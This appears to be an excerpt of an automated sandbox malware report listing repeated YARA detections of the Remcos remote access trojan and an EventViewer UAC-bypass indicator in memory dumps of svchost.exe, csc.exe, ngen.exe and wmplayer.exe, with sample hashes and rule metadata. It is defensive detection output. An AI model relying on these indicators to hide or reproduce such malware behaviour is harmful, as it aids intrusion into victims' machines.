              Source: 19.2.ngen.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 12.2.svchost.exe.13f4f101900.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.svchost.exe.13f4f101900.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.svchost.exe.13f4f101900.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 39.2.svchost.exe.1c227360bd8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 39.2.svchost.exe.1c227360bd8.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 39.2.svchost.exe.1c227360bd8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 24.2.svchost.exe.20a4568b350.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.svchost.exe.20a4568b350.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.svchost.exe.20a4568b350.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 24.2.svchost.exe.20a45700998.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.svchost.exe.20a45700998.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.svchost.exe.20a45700998.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 12.2.svchost.exe.13f4f08c2b8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.svchost.exe.13f4f08c2b8.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.svchost.exe.13f4f08c2b8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 9.2.svchost.exe.138aa701bf0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.svchost.exe.138aa701bf0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.svchost.exe.138aa701bf0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 19.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 19.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 19.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 39.2.svchost.exe.1c2272eb590.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 39.2.svchost.exe.1c2272eb590.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 39.2.svchost.exe.1c2272eb590.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 24.2.svchost.exe.20a45700998.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.svchost.exe.20a45700998.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 24.2.svchost.exe.20a45700998.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 9.2.svchost.exe.138aa68c5a8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.svchost.exe.138aa68c5a8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.svchost.exe.138aa68c5a8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 13.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 13.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 13.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 12.2.svchost.exe.13f4f101900.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.svchost.exe.13f4f101900.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.svchost.exe.13f4f101900.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 13.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 13.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 13.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 12.2.svchost.exe.13f4f08c2b8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.svchost.exe.13f4f08c2b8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 9.2.svchost.exe.138aa701bf0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.svchost.exe.138aa701bf0.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 9.2.svchost.exe.138aa701bf0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 24.2.svchost.exe.20a4568b350.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 24.2.svchost.exe.20a4568b350.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 39.2.svchost.exe.1c227360bd8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 39.2.svchost.exe.1c227360bd8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 9.2.svchost.exe.138aa68c5a8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 9.2.svchost.exe.138aa68c5a8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 39.2.svchost.exe.1c2272eb590.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 39.2.svchost.exe.1c2272eb590.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
              Source: 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000018.00000002.1546946748.0000020A45615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000027.00000002.1623163422.000001C227275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
